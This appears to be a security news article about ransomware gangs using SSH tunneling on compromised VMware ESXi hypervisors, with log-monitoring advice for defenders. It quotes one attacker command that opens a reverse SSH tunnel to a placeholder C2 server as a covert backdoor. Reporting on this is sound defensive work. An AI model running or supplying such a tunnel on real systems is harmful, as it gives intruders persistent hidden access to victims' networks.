Ransomware, Threat Intelligence

Covert VMware ESXI-targeted ransomware hack facilitated by SSH tunneling

VMware company brand logo on official website

VMware ESXi hypervisors are being clandestinely subjected to ransomware intrusions involving the exploitation of SSH tunneling for persistence, reports BleepingComputer.

After infiltrating ESXi instances by leveraging known vulnerabilities or stolen admin credentials, ransomware gangs proceed to utilize the built-in SSH service to facilitate lateral movement and ransomware delivery without being detected, according to an investigation from cybersecurity firm Sygnia. "...[B]y using the SSH binary, a remote port-forwarding to the C2 server can be easily setup by using the following command: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network," said Sygnia. Such findings have prompted researchers to recommend monitoring of four log files for tracking ESXi Shell command execution, conducting admin and user authentication logs, obtaining attempted logins and authentication events, and keeping security event and system logs. Admins have also been urged to view the hostd.log and vodb.log to identify possible SSH access persistence.

An In-Depth Guide to Ransomware

Get essential knowledge and practical strategies to protect your organization from ransomware attacks.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds